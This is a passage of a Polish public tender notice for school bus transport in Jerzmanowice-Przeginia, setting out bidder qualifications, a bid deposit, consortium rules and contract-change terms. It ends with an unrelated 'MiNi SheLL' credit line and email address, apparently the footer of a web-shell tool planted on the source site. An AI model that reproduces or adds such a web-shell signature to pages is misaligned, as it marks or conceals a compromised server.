każdej z tras, zdolną do wykonania zamówienia tj. posiadającą kwalifikacje zawodowe tj.: odpowiednie prawo jazdy i posiadającą min. roczne doświadczenie w transporcie osób.<br/>-	Wykaz należy przygotować według wzoru stanowiącego załącznik nr 5 „Wykaz osób”.<br/>-	Zamawiający wymaga od wykonawców wskazania w ofercie imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją, odpowiednio o kwalifikacjach i doświadczeniu tych osób.<br/>3)	Dysponują odpowiednim potencjałem technicznym:<br/>Warunek będzie potwierdzony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w czasie wykonywania zamówienia co najmniej jednym przeznaczonym do realizacji przedmiotu zamówienia środkiem transportu na każdej z tras. <br/>-	Wykaz należy przygotować według wzoru stanowiącego załącznik nr 6 „Wykaz narzędzi”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu określonych w Dziale XI:<br/>1) Licencja na prowadzenie działalności w zakresie krajowego transportu osób, o której mowa w art. 5 ust. 1 ustawy z dnia 6<br/>września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r., poz. 180 z późn. zm.);<br/>2) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje, bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – według załącznika nr 4 do SWZ<br/>3) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych dla wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o<br/>podstawie do dysponowania tymi osobami - według załącznika nr 5 do SWZ;<br/>4) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z<br/>informacją o podstawie dysponowania tymi zasobami według załącznika nr 6 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia określonych w Dziale X:<br/>1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębna ofertę,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającym<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, sporządzone zgodnie z<br/>Załącznikiem nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę poprzez wniesienie wadium w wysokości: 3 000 zł<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwa-nie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku nastę-pujących formach:<br/>- w pieniądzu - przelewem na rachunek bankowy Zamawiającego:<br/>Bank Spółdzielczy Rzemiosła w Krakowie, oddział w Jerzmanowicach<br/>Nr rachunku 55 8589 0006 0150 0450 0794 0005<br/>Uwaga: za datę wniesienia wadium w tej formie uważa się datę wpływu środków pieniężnych na konto Zamawiającego. W<br/>tytule przelewu proszę wpisać nr referencyjny nadany sprawie przez Zamawiającego CUW.26.10/2022<br/>a) w gwarancjach bankowych.<br/>b) w gwarancjach ubezpieczeniowych.<br/>c) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsię-biorczości.<br/>4. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia gwarancja powinna być<br/>sporządzona zgodnie z obowiązującym prawem i winna za-wierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji (Zamawiające-go), nazwę gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>3) kwotę gwarancji,<br/>4) termin ważności gwarancji,<br/>5) nieodwołalne i bezwarunkowo zobowiązanie gwaranta do: „zapłacenia kwoty gwarancji na pierwsze pisemne żądanie<br/>Zamawiającego zawierające oświadczenie, że za-chodzi przewidziana przepisami prawa zamówień publicznych podstawa<br/>do zatrzymania wadium przez Zamawiającego.<br/>6. Gwarancja (poręczenie) nie może przewidywać żadnych dodatkowych warunków formalnych, od których uzależniona<br/>byłaby wypłata sumy gwarancyjnej (poręczonej).<br/>7. Zamawiający zwraca wadium zgodnie z zapisami ustawy Pzp.<br/>8. Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 Ustawy, powoduje rozwiązanie stosunku prawnego z<br/>wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX Ustawy Pzp.<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na<br/>którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za<br/>przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>10. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi<br/>oświadczenia o zwolnieniu wadium.<br/>11. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie innej niż pieniądz,<br/>występuje odpowiednio do gwaranta lub po-ręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego<br/>stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających<br/>okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych<br/>dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co<br/>spowodowało brak możliwości wy-brania oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/>2) wykonawca, którego oferta została wybrana:<br/>- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,<br/>którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku oferty wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) ich oferta musi spełniać następujące<br/>wymagania:<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>3. W formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>4. Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>5. oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust.<br/>1 ustawy składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia w odniesieniu do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie<br/>umowy.<br/>8. Zamawiający informuje o treści przepisu art. 117 ust. 3 Ustawy, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane.<br/>9. W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci<br/>oświadczenia, z którego wynika, które usługi transportowe wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia stanowi załącznik nr 7 do SWZ i zamawiający zaleca złożyć to oświadczenie w tym formularzu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1. Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem nieważności.<br/>2. Zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania<br/>zmian postanowień umowy, w przypadkach opisanych w niniejszym paragrafie.<br/>3. Zamawiający zastrzega sobie możliwość zmian postanowień umowy w zakresie przed-miotu umowy w następujących<br/>przypadkach:<br/>a) rozszerzenie lub zawężenie trasy:<br/>• w przypadku zmiany trasy w trakcie roku szkolnego, jeżeli zmiana nie wpływa istotnie na liczbę kilometrów/zakres trasy;<br/>• w przypadku dodania nowego przystanku jeżeli zmiana nie wpływa istotnie na liczbę kilometrów/zakres trasy;<br/>b) zmiana częstotliwości kursów, liczby przewozów, terminów wykonywania usługi – w przypadku gdy jest to podyktowane<br/>obiektywnymi czynnikami niemożliwymi do przewidzenia<br/>c) zawieszenia usług na czas określony w przypadku nieprzewidzianych okoliczności uniemożliwiających uczęszczanie<br/>dzieci do szkoły.<br/>d) trwałej zmiany samochodu skierowanego do realizacji usługi, z zastrzeżeniem, że nowy samochód musi spełniać warunki<br/>dla środków transportu, określone przez Zamawiającego w procedurze o udzielenie zamówienia publicznego (nie wymaga<br/>aneksu).<br/>4. Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich<br/>wykonywania oraz liczby dzieci, ze względu na okoliczności których strony nie mogły przewidzieć w chwili zawarcia umowy,<br/>a podyktowanych potrzebami Zamawiającego wynikającymi z realizacji obowiązku zapewnienia dzieciom dojazdu do<br/>szkolnych.<br/>5. Zmiany danych dotyczących stron, innych osób wskazanych imiennie w umowie, nie będą traktowane jako zmiany<br/>Umowy i będą dokonywane w formie jednostronnego oświadczenia Strony, której zmiana dotyczy, złożonego na piśmie pod<br/>rygorem nieważności.<br/>6. Jeśli zmiana nie wpływa na zakres trasy ustalony w zleceniu wykonawczym do umowy oraz nie wpływa na wartość<br/>umowy, Zamawiający dopuszcza jedynie zmianę zlecenia wykonawczego bez konieczności sporządzania aneksu.<br/>7. W związku z obowiązującym stanem epidemii, Strony przewidują możliwość zmiany umowy na warunkach określonych w<br/>art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i<br/>zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz.U.2021.2095).<br/>8. Zamawiający zastrzega sobie możliwość czasowego zawieszenia wykonywania umowy lub jej części w przypadku<br/>zawieszenia lub odwołania zajęć w szkołach. Za okres czasowego zawieszenia wykonywania umowy Wykonawcy nie<br/>przysługuje wynagrodzenie odpowiednio w całości lub w części, co do której zawieszono wykonywanie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://jerzmanowice-przeginia.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 3.	Wykonawca podlega wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835). Wyklucza się:<br/> <br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/> <br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/> <br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/> <br/>4.	Wykluczenie, o którym mowa w ust. 3, następuje na okres trwania okoliczności tam wymienionych.

Creat By MiNi SheLL
Email: jattceo@gmail.com